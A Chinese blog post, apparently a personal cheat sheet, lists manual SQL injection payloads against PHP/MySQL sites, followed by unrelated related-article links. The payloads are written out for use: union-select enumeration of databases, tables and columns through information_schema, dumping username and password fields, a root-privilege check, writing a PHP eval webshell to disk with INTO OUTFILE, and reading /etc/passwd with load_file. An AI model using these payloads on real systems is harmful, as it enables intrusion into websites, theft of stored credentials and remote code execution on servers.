我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。

暴字段长度

Order by num/*

匹配字段

and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置

and 1=2 union select 1,2,3,4,5……n/*

利用内置函数暴数据库信息

version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限:

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1

暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法(一个可用字段显示两个数据内容):

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件:1、知道站点物理路径

2、有足够大的权限(可以用select …. from mysql.user测试)

3、magic_quotes_gpc()=OFF123

select ‘<?php eval($_POST[cmd])?>’ into outfile ‘物理路径’

and 1=2 union all select 一句话HEX值 into outfile ‘路径’

load_file() 常用路径:

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “

php手工注入语句,PHP+MySQL 手工注入语句大全相关推荐

  1. SQL注入第二章节MYSQL手工注入

    SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...

  2. mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]

    1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...

  3. mysql 查询语句 参数,mysql参数化查询语句有关问题

    mysql参数化查询语句问题 部分代码如下: using (MySqlConnection conn = new MySqlConnection(connectionString)) { conn.O ...

  4. pythonsql注入_python使用mysql,sql注入问题

    python使用mysql importpymysql conn=pymysql.connect( host= '127.0.0.1', #连接地址 port = 3306, #端口 user = r ...

  5. 注入学习(3) Mysql+php注入 基于bool和时间的盲注

    练习三:Mysql+php 基于bool和时间的盲注 今天要用的函数(详细的直接看链接): left()函数:left()得到字符串左部指定个数的字符 left( string, n ) #strin ...

  6. mysql50条必看语句,对MySql经常使用语句的全面总结(必看篇)

    下面总结的知识点全是经常用的,全都是干货,好好收藏吧. /* 启动MySQL */ net start mysql /* 连接与断开服务器 */ mysql -h 地址 -P 端口 -u 用户名 -p ...

  7. mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析

    前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...

  8. mysql报错注入实战_手工注入——MySQL手工注入实战和分析

    今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...

  9. mysql create注入语句_mysql注入总结

    作者:L.N. 时间:2012-07-23 博客:lanu.sinaapp.com 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert.update) 0 ...

最新文章

  1. 数据结构 -- 散列表
  2. Windows 10或成为最后一个Windows版本
  3. Python3 系列之 编程规范篇
  4. leetcode 在排序数组中查找元素的第一个和最后一个位置
  5. C编程,随机数,排序
  6. 【项目经验】如果想在mapper.xml文件中的一个标签中写多条sql语句,则需要在jdbc的配置文件中稍做配置
  7. python commands_Windows环境下使用python的commands.getstatusoutput
  8. 02-橄榄球 VS 软件
  9. JS获取鼠标的坐标和滚动条的位置
  10. Oracle 临时表
  11. webpack项目使用eslint建立代码规范
  12. [WebApi] 捣鼓一个资源管理器--服务器端分割压缩图片
  13. CSS面试题汇总(三)
  14. __declspec,__cdecl,__stdcall区别和作用
  15. 设置下拉菜单的几种方法
  16. 《HarmonyOS开发 – 小凌派-RK2206开发笔记》第4章 串口应用开发
  17. Powershell运行脚本异常:无法加载文件...因为在此系统上禁止运行脚本
  18. QT+OSG/osgEarth编译之四十三:jasper+Qt编译(一套代码、一套框架,跨平台编译,版本:basisjasper-2.0.12)
  19. 机房监控系统的组成及功能!
  20. 使用cmake构建工程

热门文章

  1. NDuiker项目第2天总结
  2. tf.nn.softmax_cross_entropy_with_logits 和 tf.contrib.legacy_seq2seq.sequence_loss_by_example 的联系与区别
  3. 【Matlab 控制】求左右特征向量
  4. Allegro16.6软件布局设计技巧:模块复用
  5. 基于Quartus II软件FPGA与PC之间的串行通信系统开发(9000+字)
  6. InstallUtil.exe版本引起安装windows services 服务遇到的问题,System.BadImageFormatException...
  7. 算法学习之路|住房空置率
  8. 网络设备主备配置系列3:华为防火墙(路由模式)
  9. 长亭技术专栏 安全攻防技术分享
  10. Unity UGUI —— 无限循环List(转载)